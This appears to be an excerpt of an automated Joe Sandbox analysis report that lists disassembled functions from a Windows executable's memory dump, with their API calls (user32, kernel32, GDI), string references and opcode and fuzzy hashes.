                                                                  • Instruction ID: 502499af6c4fed57a8803849289841afdffa1b87ef326e8d9c35a034d288349d
                                                                  • Opcode Fuzzy Hash: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                                  • Instruction Fuzzy Hash: 20317574A10214AFCB01EF65DC92D5E7BB5FB88318B51847AF800AB792D739BD05CB58
                                                                  Function 0042EAA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAD2
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAD8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB01
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                  • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                  • API String ID: 828529508-2866557904
                                                                  • Opcode ID: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                                  • Instruction ID: 08d6e73c43f4c72d4bf81f88f5f107f4332e42bd1359b104b354d246f0006fb7
                                                                  • Opcode Fuzzy Hash: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                                  • Instruction Fuzzy Hash: 14F0F6D034062237E620B6BFAC82F7B59CC8F9472AF140036F109EB2C2E96C9905427F
                                                                  Function 004019CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                  • String ID: l>Y
                                                                  • API String ID: 730355536-3992852859
                                                                  • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                  • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                  • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                  • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                  Function 00457E18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E48
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E69
                                                                  • CloseHandle.KERNEL32(?,00457E9C), ref: 00457E8F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                  • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                  • API String ID: 2573145106-3235461205
                                                                  • Opcode ID: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                                  • Instruction ID: 364c7453444e38e17299d149b0285d9f966ded63b706bec2a35302b816cfa9f1
                                                                  • Opcode Fuzzy Hash: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                                  • Instruction Fuzzy Hash: 88018F71608304AFD711EBA99D03A2E73A9EB49715F6040B6FC10E72D3DA389D048619
                                                                  Function 0042E9A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                  • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                  • String ID: ChangeWindowMessageFilter$user32.dll
                                                                  • API String ID: 3478007392-2498399450
                                                                  • Opcode ID: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                                  • Instruction ID: 012688e8468ec3177747178b84a01981fc81215c8fc8f9e453d059575ed0bd59
                                                                  • Opcode Fuzzy Hash: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                                  • Instruction Fuzzy Hash: B5E0ECA1740314EAEA203B66BE8AF573558E724B19F54003BF100A51F2C7BC1C80CA9E
                                                                  Function 00477628 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                  • String ID: AllowSetForegroundWindow$user32.dll
                                                                  • API String ID: 1782028327-3855017861
                                                                  • Opcode ID: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                                  • Instruction ID: 000833d094a070652a329d30f0dc0cedfc4963abb7563544beb27e38e0473342
                                                                  • Opcode Fuzzy Hash: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                                  • Instruction Fuzzy Hash: 8DD05E90249B02A9D90073B94C46F6F224C8A90B68790843B7408F218ECA3CDC00AA3C
                                                                  Function 00416C24 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • BeginPaint.USER32(00000000,?), ref: 00416C4A
                                                                  • SaveDC.GDI32(?), ref: 00416C7B
                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D3D), ref: 00416CDC
                                                                  • RestoreDC.GDI32(?,?), ref: 00416D03
                                                                  • EndPaint.USER32(00000000,?,00416D44,00000000,00416D3D), ref: 00416D37
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                  • String ID:
                                                                  • API String ID: 3808407030-0
                                                                  • Opcode ID: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                                  • Instruction ID: a024d51d8e1917fcb77b8775c892227abb36bb6ea51d3f2ecd71d44c14df9e09
                                                                  • Opcode Fuzzy Hash: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                                  • Instruction Fuzzy Hash: 90414170A04244AFCB04DBA9C595FAA77F5FF48304F1640AAE8459B362D778DD81CF54
                                                                  Function 004147F8 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                                  • Instruction ID: 35d93ad14ebc553eed2a21e9b47c67a907fa477780373b58b871235641bd8dc8
                                                                  • Opcode Fuzzy Hash: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                                  • Instruction Fuzzy Hash: B23132746057409FC320EB69C584BABB7E8AF89714F04891EF9D9C7751C638EC818B19
                                                                  Function 004297C4 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429800
                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 0042982F
                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042984B
                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429876
                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429894
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                                  • Instruction ID: c6a16a7b88e0b18788f8573a4e1e1ff521d0234e697c82a38616540cbd285451
                                                                  • Opcode Fuzzy Hash: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                                  • Instruction Fuzzy Hash: 0621AF707507057AE710FB67DC82F8B7AECDB41708F54483EB905AB6D2DBB8AD418618
                                                                  Function 0041BBB0 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BBC2
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BBCC
                                                                  • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC0A
                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD75,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC51
                                                                  • DeleteObject.GDI32(00000000), ref: 0041BC92
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$A26310A570DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 4277397052-0
                                                                  • Opcode ID: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                                  • Instruction ID: 58bffdd5ee351b83518612b46dbf543796c6efca4902a0296a584a1adfede215
                                                                  • Opcode Fuzzy Hash: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                                  • Instruction Fuzzy Hash: E2317F70E00208EFDB04DFA5C942AAEB7F5EB48704F21856AF514EB381D7789E80DB95
                                                                  Function 004733C0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0045CE6C: SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 0047344D
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 00473463
                                                                  Strings
                                                                  • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473457
                                                                  • Failed to set permissions on registry key (%d)., xrefs: 00473474
                                                                  • Setting permissions on registry key: %s\%s, xrefs: 00473412
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                  • API String ID: 1452528299-4018462623
                                                                  • Opcode ID: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                                  • Instruction ID: 1dcd38469e34a8f7cdaf58011d69bd772563d378ec45d4c1a9cd481a7780d06e
                                                                  • Opcode Fuzzy Hash: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                                  • Instruction Fuzzy Hash: 9221B370A042445FCB05DFAAC8816EEBBE8DF49319F50817AE448E7392D77C5E058BAD
                                                                  Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                  • String ID:
                                                                  • API String ID: 262959230-0
                                                                  • Opcode ID: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                                  • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                  • Opcode Fuzzy Hash: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                                  • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                  Function 004143D8 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414411
                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414419
                                                                  • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442D
                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414433
                                                                  • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041443E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A122A18830$A480
                                                                  • String ID:
                                                                  • API String ID: 3325508737-0
                                                                  • Opcode ID: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                  • Instruction ID: 53d1df8a90047df028643ee63be254e951aa3f987763a81c259c8cb4a1af4cbb
                                                                  • Opcode Fuzzy Hash: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                  • Instruction Fuzzy Hash: 7101D43520C3806AE600A63D8C85A9F6BDD9FC6314F05446EF484DB282C979C801C761
                                                                  Function 00424CD8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0041F06C: GetActiveWindow.USER32 ref: 0041F06F
                                                                    • Part of subcall function 0041F06C: GetCurrentThreadId.KERNEL32 ref: 0041F084
                                                                    • Part of subcall function 0041F06C: 73A25940.USER32(00000000,Function_0001F048), ref: 0041F08A
                                                                    • Part of subcall function 004231A0: GetSystemMetrics.USER32(00000000), ref: 004231A2
                                                                  • OffsetRect.USER32(?,?,?), ref: 00424DC1
                                                                  • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E84
                                                                  • OffsetRect.USER32(?,?,?), ref: 00424E95
                                                                    • Part of subcall function 0042355C: GetCurrentThreadId.KERNEL32 ref: 00423571
                                                                    • Part of subcall function 0042355C: SetWindowsHookExA.USER32(00000003,00423518,00000000,00000000), ref: 00423581
                                                                    • Part of subcall function 0042355C: CreateThread.KERNEL32(00000000,000003E8,004234C8,00000000,00000000), ref: 004235A5
                                                                    • Part of subcall function 00424B24: SetTimer.USER32(00000000,00000001,?,004234AC), ref: 00424B3F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                  • String ID: nLB
                                                                  • API String ID: 1906964682-2031493005
                                                                  • Opcode ID: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                                  • Instruction ID: 6ccba84303d4583ac65c185f09da03f8435108134aba783506c2f58cc8f90ba1
                                                                  • Opcode Fuzzy Hash: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                                  • Instruction Fuzzy Hash: A7812871A00218CFDB14DFA8D884ADEBBF4FF88314F51416AE905AB296E778AD45CF44
                                                                  Function 00406F94 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FF3
                                                                  • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040706D
                                                                  • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$NameOpenResourceUniversal
                                                                  • String ID: Z
                                                                  • API String ID: 3604996873-1505515367
                                                                  • Opcode ID: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                  • Instruction ID: 6c201072c7e19ab920663406aa1001a3a7646b20d706545eb94c2f0a958ae389
                                                                  • Opcode Fuzzy Hash: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                  • Instruction Fuzzy Hash: 17517070E04208ABDB11DF55C941A9EBBF9EF49304F1481BAE500BB3D1D778AE458B6A
                                                                  Function 0044CFB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetRectEmpty.USER32(?), ref: 0044D046
